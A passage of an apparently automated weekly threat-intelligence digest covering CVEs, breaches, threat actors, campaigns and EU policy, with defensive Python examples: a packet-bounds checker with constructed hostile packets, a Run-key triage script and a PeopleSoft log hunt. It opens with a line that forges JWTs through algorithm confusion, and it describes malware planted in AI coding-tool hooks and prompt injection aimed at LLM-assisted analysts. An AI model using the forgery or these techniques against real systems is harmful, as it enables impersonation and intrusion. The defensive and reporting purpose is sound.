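    return encode_jwt({"alg": "HS256", "typ": "JWT"}, payload, lambda d: hs256(d, public_key_json.encode()))
```

Both verifiers accept the legitimately issued token; only the confusable one accepts the forged HS256 token carrying an arbitrary `sub`, which is the "impersonate any federated user" outcome the advisory describes. The fix is not a bigger key: it is pinning the expected algorithm per key (or per issuer) so that the header is checked against configuration rather than consulted.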

CVE-2026-55200 / CVE-2026-55199 — libssh2 heap out-of-bounds write with public PoC

The GitHub Security Advisory GHSA-r8mh-x5qv-7gg2 describes a heap out-of-bounds write in libssh2's ssh2_transport_read() that fails to enforce an upper bound on the packet_length field (CVSS 9.2), with a companion pre-auth DoS (CVE-2026-55199) corroborated by NCSC-NL NCSC-2026-0210; public PoC code was reported within the window (see daily 06-28). An upstream fix has landed (the GHSA references the fix commit), but tagged-release availability still varies across the binding and appliance ecosystem — so the operational task is SBOM exposure tracking and chasing each embedding vendor's release, not a single library bump (see § 11 caveat). libssh2 is embedded in a long tail of management tooling, appliances and language bindings.

Changes since first coverage (1 prior appearance)
  1. 2026-06-28 · 2026-06-28
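The bound check the advisory describes as missing, as an added example in Python against the RFC 4253 binary-packet layout (not libssh2's C): an unchecked reader that trusts packet_length as it arrives beside a reader that bounds it before any of it is used to size a copy. The 35000-byte ceiling is RFC 4253 §6.1's minimum-acceptance size reused here as the maximum, and the sample packets are constructed.

```python
import struct

# RFC 4253 §6.1: peers must accept total packet sizes up to 35000 bytes; larger is treated as hostile here.
MAX_PACKET_LEN = 35000


def parse_packet_unchecked(buf: bytes):
    """The advisory's pattern: packet_length read off the wire and used with no upper bound."""
    packet_length = struct.unpack(">I", buf[:4])[0]
    padding_length = buf[4]
    # In C this arithmetic sizes an allocation or a copy; Python slicing silently truncates and hides the bug.
    payload = buf[5:4 + packet_length - padding_length]
    return packet_length, payload


def parse_packet_checked(buf: bytes, max_len: int = MAX_PACKET_LEN) -> bytes:
    """Bound every field before it is used for arithmetic, then require the bytes to actually be present."""
    if len(buf) < 5:
        raise ValueError("short read")
    packet_length = struct.unpack(">I", buf[:4])[0]
    if not 1 <= packet_length <= max_len:
        raise ValueError("packet_length out of bounds")
    padding_length = buf[4]
    # payload_length = packet_length - padding_length - 1 must be >= 0, and padding is at least 4 bytes.
    if padding_length < 4 or padding_length >= packet_length:
        raise ValueError("invalid padding_length")
    if len(buf) < 4 + packet_length:
        raise ValueError("truncated packet")
    return buf[5:4 + packet_length - padding_length]


def build_packet(payload: bytes, block: int = 8) -> bytes:
    """Encode a plaintext packet per RFC 4253 §6: padding of at least 4, total length a multiple of block."""
    padding = block - (5 + len(payload)) % block
    if padding < 4:
        padding += block
    packet_length = 1 + len(payload) + padding
    return struct.pack(">IB", packet_length, padding) + payload + b"\x00" * padding


def rejects(buf: bytes) -> bool:
    """True if the checked reader refuses the packet."""
    try:
        parse_packet_checked(buf)
    except ValueError:
        return True
    return False


# Constructed hostile inputs: an absurd packet_length, and a padding_length larger than the packet.
EVIL_LENGTH_PACKET = struct.pack(">IB", 0xFFFFFFF0, 4) + b"\x00" * 16
EVIL_PADDING_PACKET = struct.pack(">IB", 8, 200) + b"\x00" * 8
```

The unchecked reader happily reports a 4 GB packet_length for a 21-byte buffer; that number is exactly what a C implementation would feed into its buffer arithmetic. The checked reader refuses it, and also refuses the underflow case where padding_length exceeds packet_length, which turns the payload-length subtraction negative.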

4. Sector & victim patterns

Public administration & government

The week's public-sector signal is heavily Swiss/European. NCSC-CH reported an active Microsoft 365 "voicemail" phishing wave in Switzerland delivering infostealers and harvesting M365 credentials, with chain-phishing onward from compromised mailboxes. The Swiss Federal Audit Office reported that the two-year-old split of federal cyber-governance leaves strategic oversight without a complete incident picture — a structural finding for any federated public administration. Further afield, Ukraine's postal operator Ukrposhta had digital services disrupted by an overnight attack, and Brazil's national Cell Broadcast alert platform was hijacked to push fake emergency messages to ~30M phones — a reminder that government alerting infrastructure is itself a target.

Healthcare

Third-party processors drove the week's healthcare exposure. Xsolis, a healthcare-AI utilization-management vendor, disclosed a phishing-driven breach affecting 1,396,519 patients across seven US health systems — the data sat at the processor, not the hospitals. The UK's HCRG Care Group began notifying patients of a February 2025 Medusa ransomware attack — a 16-month notification lag. The Lantronix BRIDGE:BREAK flaw (§ 3) additionally exposes serial-attached medical devices.

Education

Education was a structural victim class. The ShinyHunters Canvas/Instructure breach hit 160 UK universities per the UK CMC sector review (ransom paid, limited downstream damage). The unpatched ILIAS 11.0 SQL-injection (CVE-2026-12789, PoC-public, no patch) directly exposes the DACH learning-management estate, and self-hosted Gitea CI (§ 3) is concentrated in universities. The common thread: education runs exposed CMS/LMS/forum and developer stacks with thin operational security.

Technology & SaaS supply chain — the week's busiest victim class

The dominant pattern of the week was the third party as entry vector: Klue/Icarus (Salesforce OAuth, ~24 firms), ShapedPlugin (WordPress build pipeline), the npm worm wave, 8x8's SEC-disclosed Salesforce theft, and the BadBlocker Chrome extension (§ 6). In nearly every case the victim organisation had nothing of its own to patch — the compromise rode in through a trusted vendor, integration token, package or browser extension.

5. Incidents & disclosures recap

Social engineering and SSO abuse opened the highest-profile intrusions

Madison Square Garden was breached by a single vishing call into its identity platform; the operators talked a low-level employee into authorising access. This is the same human-layer entry that has driven the year's most damaging extortion. The defensive lesson is process, not product: callback verification on help-desk identity changes, no MFA reset on an inbound call, and alerting on anomalous SSO grants from new devices.

Mass third-party exposures: Xsolis, Texas Parks & Wildlife, Canvas

Three large data exposures all traced to a third party rather than the named organisation: Xsolis (1.4M patients via a healthcare-AI processor), Texas Parks & Wildlife (3.08M licence holders via an unnamed licence-sales vendor, with a public-vs-AG-filing SSN contradiction noted in § 11), and the Canvas/Instructure LMS breach (160 UK universities). The recurring control gap is vendor data-minimisation and breach-notification SLAs.

Attribution and accountability: Jaguar Land Rover and Scattered Spider

Two disclosures closed loops opened months ago. A New York Times investigation gave the first named attribution for the 2025 Jaguar Land Rover ransomware attack — a Russian state-linked criminal group — though investigators have not determined whether the operators worked for, independently of, or with the tacit approval of the Russian government. And two Scattered Spider members pleaded guilty over the 2024 Transport for London intrusion. Both reinforce that the dominant English-speaking extortion ecosystems are being mapped to named individuals and state-linked clusters.

6. Research & threat-actor developments

Research: the trust chain, not the perimeter, was the week's attack surface

The week's research converges on one structural shift: the productive attack surface in 2026 is the set of trust relationships connecting developer tools, CI/CD pipelines, SaaS integrations, AI coding agents and the browser — not the network perimeter. Tenable's analysis of the Miasma worm frames it as a "Developer Credential Economy": an infostealer harvests a developer credential (a Red Hat GitHub token sat in infostealer logs ~7 weeks before weaponisation), it is brokered underground, then weaponised through npm and — the novel capability — injected into the SessionStart hooks of AI coding tools so it runs when a developer opens a repo (Socket enumerates at least five affected tools — Claude Code, GitHub Copilot, Gemini CLI, Cursor, VS Code). The entire kill chain carries no CVE, and SLSA provenance attestations passed registry checks — provenance without content scanning is no defence (Socket).

The same trust-boundary theme runs through the week's other primary research: the Klue/Icarus cascade (a 2022 OAuth grant, § 2); Cordyceps, which found 300+ exploitable pull_request_target GitHub Actions misconfigurations leaking main-branch secrets (Novee Security); Unit 42's malicious-skill payloads bypassing the OpenClaw agent sandbox (Unit 42); and Island's "BadBlocker", an 11M-install Chrome ad-blocker one server-side config change away from arbitrary JavaScript on any site, with no extension update or store review (Island). On the identity plane, Netcraft documented Bluekit, a Browser-in-the-Middle phishing-as-a-service platform that authenticates the victim into the attacker's browser session, defeating Device Bound Session Credentials (Netcraft) — a reminder that session-binding controls like DBSC do not stop a browser-in-the-middle relaying the live authenticated session. Cisco Talos's field guide to Windows COM abuse (ITaskService, BITS, WMI, DCOM as EDR-evasion primitives) closes the loop on detection: indirect vtable calls hide activity behind legitimate service call stacks. The defender takeaway is uniform — audit OAuth grants and integration service accounts older than 12 months, restrict AI-agent hook configuration to read-only paths, treat CI/CD token scope as a reviewed principal, and don't assume FIDO2 closes the phishing path.

Threat-actor developments: Russia-nexus espionage broadens; new China-nexus and DPRK clusters

The most significant new actor finding of the week is Turla's STOCKSTAY — Google GTIG characterised a multi-component .NET/Windows Forms backdoor that communicates with its C2 over secure WebSocket and shares significant code with Kazuar (Turla's staple implant since 2017). Delivery used malicious RDP files sent by phishing and, as recently as November 2025, RAR archives exploiting WinRAR's CVE-2025-8088 (a flaw also abused by Sandworm, Gamaredon and RomCom). Current targeting is Ukrainian government and military, but earlier victims had Italian, Dutch, Polish and German foreign-policy interest — a direct read-across for Swiss federal and European governmental entities with Ukraine-adjacent policy work (The Hacker News). This sits alongside the week's other Russia-nexus signal: FBI/CISA escalated their warning that Russian intelligence (tracked as UNC5792) is now phishing Signal Backup Recovery Keys for persistent account takeover, and ESET's Gamaredon retrospective (§ 7) shows the FSB-linked group moving exfil and C2 wholesale onto trusted cloud services.

Two non-Russian clusters round out the picture. Unit 42 documented CL-STA-1062, a Chinese-speaking cluster (overlapping Talos's UAT-7237) deploying the new TinyRCT .NET backdoor via AppDomainManager injection against Southeast-Asian government and state-owned energy targets (Unit 42); Kaspersky GReAT analysed the StrikeShark cluster's SharkLoader deploying Cobalt Strike via "Perfect DLL Hijacking" against government targets (Securelist). And SentinelLABS' macOS.Gaslight, a DPRK-aligned Rust backdoor, notably turns prompt injection on the LLM-assisted analyst rather than the sandbox (SentinelLABS) — an early instance of tradecraft built specifically to poison AI-assisted triage. Attribute the claim to the research outfit, not the state, where the source itself hedges.

7. Annual / periodic threat reports

Swiss Post Cybersecurity — inaugural Swiss Threat Landscape Report `[SINGLE-SOURCE]`

Swiss Post Cybersecurity published its first Swiss Threat Landscape Report at its Hack'Events conference (06-23), drawing on its own SOC, IR and offensive-security practice. For a Swiss public-sector SOC this is the most locally-grounded threat baseline of the week; the synthesis worth carrying beyond the daily's recap is that the report's emphasis on phishing, identity compromise and AI-abuse maps precisely onto the week's operational signal — the NCSC-CH M365 voicemail-phishing wave (§ 4), the Bluekit BitM and Klue OAuth identity attacks (§§ 2, 6), and AI-agent supply-chain abuse (§ 6). The local-vendor view and the week's incidents agree on where Swiss defenders should spend marginal effort: identity and the human layer, not perimeter CVEs alone.

ESET "Killing me gently" — a de-facto mid-year RaaS-tooling report

Background. The Gentlemen emerged in late 2025 as a RaaS operation founded by "hastalamuerte" (a former Qilin affiliate per Group-IB, previously affiliated with Embargo, LockBit, Medusa and BlackLock per PRODAFT). ESET first hypothesised an in-house EDR-killer in February 2026; Group-IB and Check Point independently corroborated before the gang's own internal data leaked. By April 2026 the group accounted for ~10% of global ransomware activity, and Krebs (06-10) linked the alias to a named individual in Izhevsk, Russia.

ESET's 06-26 deep-dive into the leaked internal data is the most substantive published-in-window documentation of RaaS tooling structure, and reads as a mid-year complement to the W25 Check Point State of Ransomware Q1 2026. Three structural findings a detection engineer should register: (1) GentleKiller is a modular in-house framework with at least eight BYOVD variants, each impersonating a different vendor and abusing a different kernel driver — driver allow-listing alone is insufficient without process-injection-chain detection; (2) the group integrates rival gangs' EDR killers (HexKiller from Warlock, ThrottleBlood shared with MedusaLocker/DragonForce, HavocKiller), so tooling overlap no longer implies operational overlap; (3) victims are selected centrally on FortiGate misconfiguration rather than geography, tying the Gentlemen victim pipeline directly to FortiBleed-style reconnaissance (§ 8). New BYOVD PoCs are operationalised within days of public release. (daily 06-27)

ESET Gamaredon 2025 — annual actor retrospective

Background. Gamaredon (FSB-linked, Russia-nexus) has been ESET's most-tracked Ukraine-focused operator for years; its prior annual papers documented a high-tempo, PowerShell-heavy toolset and aggressive infrastructure churn.

ESET's 2025 Gamaredon paper (covered 06-26) documents six new PowerShell tools and the wholesale migration of exfiltration and C2 onto trusted cloud services, tunnels and "workers" — the horizon implication for European public-sector defenders is detection-oriented: Gamaredon-class C2 increasingly hides inside legitimate cloud-service traffic (Cloudflare workers, Telegram, dead-drop resolvers), so network-indicator blocking degrades and behavioural detection on the endpoint and on anomalous cloud-service egress becomes the durable control.

8. Long-running campaigns — status update

FortiBleed (`key: fortibleed`)

The W25 top story continued without a scale revision — the device count holds at the 86,644 figure the dailies reported — but the in-window development is the clearest state-interest signal yet: CISA updated its hardening alert on 06-22 to link Fortinet's revised guidance, and reporting now confirms that in mid-June the Russian-speaking operator completed offline Kerberos-hash cracking from captured FortiGate configs and immediately exfiltrated DFS backup data from a NATO-aligned defence contractor — a full AD domain takeover (Security Affairs). Outstanding for defenders: treat any FortiGate admin/VPN credential active May–June 2026 as compromised, rotate, then hunt AD for pass-the-hash, DCSync and DFS-backup exfiltration (Kerberos ticket anomalies, LSASS access, ntdsutil/impacket artefacts). Patch level is irrelevant — this is credential reuse, not a new CVE.

ShinyHunters / UNC6240 Oracle PeopleSoft campaign (`key: shinyhunters-peoplesoft`)

The campaign behind the § 1 NAIC breach. GTIG/Mandiant attributes to UNC6240 an active zero-day exploitation of Oracle PeopleSoft (CVE-2026-35273) between May 27 and June 9, predating Oracle's advisory; staging environments deployed customised MeshCentral agents masquerading as cloud endpoints, then ran a per-victim [victim]_fanout.sh lateral-movement-and-defacement script (Google GTIG). ~300 PeopleSoft instances compromised, ~100 organisations notified, 68% higher education, with the University of Nottingham among the first named public victims (SecurityWeek). The status this week: NAIC confirmed (§ 1), and notifications are still landing, so more European education and public-finance victims are likely. The weekly lens: this is ShinyHunters operating as a zero-day-capable ERP attacker — a capability shift from the brand's 2021–2024 credential-stuffing persona. Outstanding question: which EU universities running PeopleSoft are in the un-notified tail.

Changes since first coverage (9 prior appearances)
  1. 2026-06-28 · 2026-06-28
  2. 2026-06-22 · 2026-W25
  3. 2026-06-20 · 2026-06-20
  4. 2026-06-18 · 2026-06-18
  5. 2026-06-16 · 2026-06-16
  6. 2026-06-14 · 2026-W24
  7. 2026-06-14 · 2026-06-14
  8. 2026-06-13 · 2026-06-13
  9. 2026-06-12 · 2026-06-12

The Gentlemen (`key: the-gentlemen`)

The W25 multi-day item now has primary-evidence depth (the ESET deep-dive, § 7) and a sharp Swiss angle: Check Point data, reported by Swiss tech press, makes Switzerland the second-most-targeted European country for the operation, which now claims 478 victims and has added worm propagation. The operationally important link is that victim selection runs on FortiGate misconfiguration scanning — so a Swiss organisation's FortiBleed exposure (above) is also its Gentlemen-victim-selection exposure. Outstanding for defenders: the same FortiGate hardening that closes FortiBleed reduces Gentlemen targeting, and EDR-tamper-protection plus driver-blocklist enforcement is the GentleKiller counter.

Operation Endgame (`key: operation-endgame`)

Europol's law-enforcement campaign extended its reach this week: the 06-24/25 Amadey and StealC takedown actioned 326 servers and 142 domains and recovered approximately 27 million stolen credentials from over 385,000 compromised systems (BleepingComputer), with Microsoft providing the Amadey/StealC infrastructure analysis (Microsoft). Combined with the W25 SocGholish/TA569 seizure (106 servers), Endgame has now dismantled three commodity delivery-and-theft networks in quick succession. The defender gap: no arrests were announced for this phase, so infrastructure can reconstitute — cross-reference the recovered 27M credentials against your identity-store canaries and hunt Amadey persistence (HKCU run-key, rundll32/regsvr32 side-loads, short-lived child processes under %AppData%\Roaming).
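The Run-key part of that Amadey persistence hunt, as an added example (not Microsoft's or Europol's tooling): it triages the text that `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints, so a dump collected on the endpoint can be reviewed offline; the sample dump, value names and paths are constructed.

```python
r"""Triage HKCU Run-key entries for the Amadey persistence pattern named above.

Added example for the Operation Endgame follow-up; not Microsoft's or Europol's tooling.
It parses the text `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints,
so a dump collected on the endpoint can be triaged offline. The sample dump is constructed.
"""
from __future__ import annotations
import re

LOLBIN_LOADERS = ("rundll32", "regsvr32")
ROAMING = re.compile(r"\\appdata\\roaming\\", re.IGNORECASE)
VALUE_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*\S)\s*$")


def parse_reg_query(text: str) -> list[tuple[str, str]]:
    """Return (value_name, command) pairs from `reg query` output."""
    return [(m["name"], m["data"]) for m in map(VALUE_LINE.match, text.splitlines()) if m]


def classify(command: str) -> str | None:
    """'high' for rundll32/regsvr32 loading from %AppData%\\Roaming, 'medium' for any
    other Roaming-resident target, None when nothing stands out."""
    if not ROAMING.search(command):
        return None
    return "high" if any(t in command.lower() for t in LOLBIN_LOADERS) else "medium"


def triage(text: str) -> list[tuple[str, str, str]]:
    """Return (severity, value_name, command) for suspicious entries, high first."""
    hits = [(sev, n, c) for n, c in parse_reg_query(text) if (sev := classify(c))]
    return sorted(hits, key=lambda h: h[0] != "high")


# Constructed dump: a benign vendor entry under AppData\Local, a rundll32 DLL
# side-load from Roaming, and a bare executable staged in Roaming.
SAMPLE_DUMP = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Startup     REG_SZ    rundll32.exe C:\Users\alice\AppData\Roaming\9f3ac1\clip.dll,Main
    Updater     REG_SZ    C:\Users\alice\AppData\Roaming\svc\update.exe
"""

if __name__ == "__main__":
    for sev, name, cmd in triage(SAMPLE_DUMP):
        print(f"[{sev}] {name}: {cmd}")
```

Pair each "high" hit with the process-creation telemetry for the same host to catch the short-lived child processes the paragraph mentions; the run key alone only tells you what will launch at next logon.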

9. Policy & regulatory horizon

Netherlands NIS2 (Cyberbeveiligingswet) clears the lower house — entry into force targeted for 1 July 2026

The Dutch transposition is in its final step: the Tweede Kamer (lower house) approved the Cyberbeveiligingswet on 15 April 2026 (Rijksoverheid), with the Eerste Kamer (upper house) ratification vote still pending in late June and the government targeting 1 July 2026 for entry into force. NCSC-NL is the designated supervisor; the regime runs a three-step 24h / 72h / one-month incident-notification protocol, essential-entity penalties up to €10M or 2% of turnover, and personal board liability for security-measure oversight (NL Digital Government). This is the fresh delta on the W25 NIS2-transposition item, which listed the Netherlands as pending; France, Ireland, Luxembourg and Spain remain non-transposed. What changes for defenders: any essential/important entity with Dutch operations or Dutch counterparties is about to face an enforceable notification clock and a named supervisor; wire NCSC-NL's 24/72-hour flow into the incident-response runbook now, and re-check which group entities fall in scope.

EU Commission proposes a major Europol / Eurojust mandate expansion

On 24 June the Commission tabled COM(2026) 580 proposing to expand Europol and Eurojust: automated, near-real-time national-police-to-Europol data upload via a new "Police Shared Data Space" cloud, Europol Support Offices embedded in Member-State agencies, an explicit Eurojust cybercrime mandate, and a roughly doubled (~€3bn) budget, with cybercrime and AI-accelerated threats cited as primary drivers (European Commission). The Protect Not Surveil coalition warns of systematic data ingestion without categorisation safeguards. This is co-decision and unlikely to bind before 2027+, but public-sector CISOs in EU Member States should track it now: it reshapes how incident and victim data may flow to Europol, with data-protection and onward-sharing implications for breach reporting.

EU Cyber Resilience Act — 75 days to the 11 September vulnerability/incident-reporting obligation

CRA Article 28 (conformity-body notification) entered force on 11 June 2026; the next binding milestone — mandatory vulnerability/incident reporting by manufacturers to ENISA's Single Reporting Platform — activates 11 September 2026, now ~75 days out (ENISA SRP). ENISA has not yet published a dry-run schedule, stating guidance is due June–August (Crowell & Moring). For Swiss readers the practical action is procurement-side: Swiss manufacturers selling digital products into the EU fall in scope, and Swiss public-sector procurement teams should add CRA compliance attestations to vendor specs and confirm in-scope suppliers can meet the 24/72-hour SRP reporting flow before it binds.

10. Looking ahead — what to watch next week

A focused, justified list — items already in motion, not predictions.

  • ShinyHunters PeopleSoft notifications are still landing — expect more named European education and public-finance victims. GTIG has notified ~100 organisations (68% higher education) and NAIC is the fresh high-profile case; patch internet-reachable PeopleSoft and hunt /PSEMHUB/ and /PSIGW/HttpListeningConnector. (Google GTIG; daily 06-28)
  • FortiBleed is not a one-and-done credential reset — full AD domain takeover is now confirmed at a NATO-aligned contractor. Finish session termination and credential rotation, then hunt for post-compromise AD persistence (Kerberos abuse, DCSync, DFS-backup exfiltration) rather than assuming the reset closed it. (CISA; daily 06-24)
  • The Klue/Icarus extortion surface is multiplying after the "resolution" — a second group is now extorting ~195 listed organisations. Any firm with a Klue/Salesforce integration should expect renewed extortion contact regardless of Icarus's stated data deletion; complete OAuth-grant revocation and CRM-egress monitoring. (SecurityWeek; daily 06-27)
  • CRA Single Reporting Platform go-live is ~75 days out (11 September); ENISA's dry-run schedule is due now. In-scope manufacturers — including Swiss exporters to the EU — should register and wire the 24/72-hour reporting flow into their PSIRT process before the obligation binds. (ENISA SRP)
  • EDPB Article 33 harmonised breach-notification template consultation closes 5 August. Still open with no in-window change; multi-jurisdiction breach-response owners have a closing window to comment before the EDPB sets a mandatory-adoption timeline. (EDPB)
  • npm v12 will disable install scripts by default — the week's Miasma worm wave is the reminder to audit CI now. Miasma's postinstall-and-SessionStart-hook propagation is exactly the kill chain --ignore-scripts / npm v12 defaults neutralise; inventory pipelines and AI-coding-tool hook configs that rely on build scripts. (Socket; daily 06-27)
  • libssh2 CVE-2026-55200 has a public PoC and an upstream fix commit, but tagged releases lag across the binding ecosystem — track the embedded-dependency fix pipeline. Inventory appliances, tooling and language bindings that ship libssh2 and chase each vendor's release rather than assuming a single library bump closes it. (NCSC-NL; daily 06-28)
  • Scattered Spider TfL sentencing is set for 16 July. First UK court outcome on the campaign; the vishing/social-engineering TTP precedent is directly relevant to European transport and public-sector identity-desk hardening. (UK NCA; daily 06-23)
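For the PeopleSoft item in the list above, one way to hunt web-server access logs for the two paths it names, as an added example (not GTIG's or Oracle's tooling): it parses Apache/NGINX combined-format lines and counts hits per client, separating an internal allow-list that is an assumption to replace with your own integration ranges; the log lines are constructed.

```python
"""Hunt access logs for the PeopleSoft paths named above (/PSEMHUB/, /PSIGW/HttpListeningConnector).

Added example for the looking-ahead item; not GTIG's or Oracle's tooling. It parses
Apache/NGINX combined-format lines and counts watched-path hits per client, split by
an internal allow-list (an assumption to replace with your own ranges). Log lines are constructed.
"""
from __future__ import annotations
import ipaddress
import re
from collections import Counter

WATCH_PATHS = ("/psemhub/", "/psigw/httplisteningconnector")  # compared lower-case
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: expected integration sources

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

def parse_line(line: str) -> dict | None:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None

def is_internal(ip: str) -> bool:
    try:
        return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)
    except ValueError:  # not an IP literal (e.g. a hostname from a misconfigured logger)
        return False

def hunt(lines: list[str]) -> dict[str, Counter]:
    """Count watched-path requests per client IP, bucketed as external or internal."""
    result = {"external": Counter(), "internal": Counter()}
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"].lower().startswith(WATCH_PATHS):
            bucket = "internal" if is_internal(rec["ip"]) else "external"
            result[bucket][rec["ip"]] += 1
    return result

# Constructed sample: one expected internal integration call, one external host
# probing both paths, and one ordinary sign-in page request that is not flagged.
SAMPLE_LOG = [
    '10.1.2.3 - - [23/Jun/2026:08:01:10 +0200] "POST /PSIGW/HttpListeningConnector HTTP/1.1" 200 512 "-" "Java/1.8"',
    '203.0.113.9 - - [23/Jun/2026:08:02:41 +0200] "GET /PSEMHUB/hub HTTP/1.1" 200 2048 "-" "curl/8.5"',
    '203.0.113.9 - - [23/Jun/2026:08:02:45 +0200] "POST /PSIGW/HttpListeningConnector HTTP/1.1" 200 310 "-" "curl/8.5"',
    '198.51.100.7 - - [23/Jun/2026:08:03:00 +0200] "GET /psp/ps/?cmd=login HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for bucket, counts in hunt(SAMPLE_LOG).items():
        print(bucket, dict(counts))  # external {'203.0.113.9': 2} / internal {'10.1.2.3': 1}
```

Any external client in the result is a lead to check against the May 27 – June 9 exploitation window; internal hits should match a known integration source, and an unexpected one deserves the same scrutiny.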

11. Verification & coverage notes

  • Single-source / attributed claims. The "second extortion group" in the Klue/Icarus item (§ 2) and its claim of ~195 listed organisations rest on a single primary (The Next Web, relaying a private Klue customer update obtained by TechCrunch); the allegation that Klue paid the original Icarus operator is unverified and is attributed as a claim, not stated as fact. The NAIC 3.1 TB figure is ShinyHunters' own claim relayed by tech press; NAIC confirms the breach and the rating-feed pause but not the volume. The "Switzerland is the second-most-targeted European country" ranking for The Gentlemen (§§ 0, 8) rests on a single source (inside-it.ch relaying Check Point data); the co-cited ESET paper does not state a European country ranking, and inside-it.ch returns 403 to the routine's fetcher, so the specific ranking could not be independently re-verified this run — it is attributed, not asserted as established fact.
  • Unresolved contradiction. Texas Parks & Wildlife (§ 5): the daily flagged a discrepancy between the public statement and the state AG filing over whether SSNs were exposed; unresolved this week, carried as a confidence caveat.
  • Items considered and dropped (may resurface). RoguePlanet (CVE-2026-50656) — carried in the W25 looking-ahead but no fresh in-window source on a Microsoft fix, so dropped rather than re-asserting stale information. eBanking IPv4-mapped-IPv6 phishing (06-22), the Brazil Cell Broadcast hijack (single-source, and outside the audience nexus apart from the § 4 mention), Arystinger botnet (06-22), Prinz Eugen ransomware (06-21) and Payouts King/Edgecution (06-25) did not clear W-PD-1 (inaction = incident / cross-day pattern / strategic horizon) and were left to the dailies. The MISP 2.5.42 CVEs (06-25) and ILIAS SQLi (06-23) are folded into §§ 3–4 rather than given standalone roll-up entries.
  • Reduced confidence. StrikeShark China-nexus attribution is Kaspersky's low-confidence assessment and is reported as such (§ 6).
  • libssh2 patch-status caveat (§ 3). The GHSA references an upstream fix commit and NCSC-NL NCSC-2026-0210 is titled as a fix advisory, so the item is marked patch-available; however, tagged-release availability lags across the binding/appliance ecosystem, so a given deployment may still be effectively unpatched pending its embedding vendor's release. Treat patch-available as "fix exists upstream," not "your appliance is fixed."
  • Sub-agents. Both horizon sub-agents (W1 threat-actor/campaign/research; W2 strategic/policy) returned within cap. No coverage axis was abandoned.
  • Verification iterations: 5 · residuals: 0 — verdict CLEAN on iteration 5, with model rotation across iterations (opus on 1/3/5, sonnet on 2/4). Iterations 1–4 remediated ~21 findings (URL corrections, an MSG→ShinyHunters attribution overclaim, a Miasma quantifier inflation, a Netherlands NIS2 "transposition done" factual overclaim, and several date/citation-anchor gaps); iteration 5 found no truth or editorial defects.
  • Coverage gaps: databreaches-net (transport-403, 3rd consecutive run — content reached via GTIG/SecurityWeek primaries instead); mandiant-gtig (RSS feed returned IncompleteRead, content obtained via WebSearch + the GTIG blog directly); inside-it-ch (Cloudflare-challenged for the W2 sub-agent UA, but the 06-26 Gentlemen article was reachable and is cited). W2 "outside-window" sources (cert-eu, edpb, bsi-de, enisa-nis360, cisa-directives) were quiet in-window, not failed fetches. The end-of-run tools/source_health.py accessibility probe did not complete inside its budget in this container (slow under the egress proxy) and was stopped so it would not block publish; the prior committed snapshot (from the 2026-06-28 daily run) stands and the next run re-probes.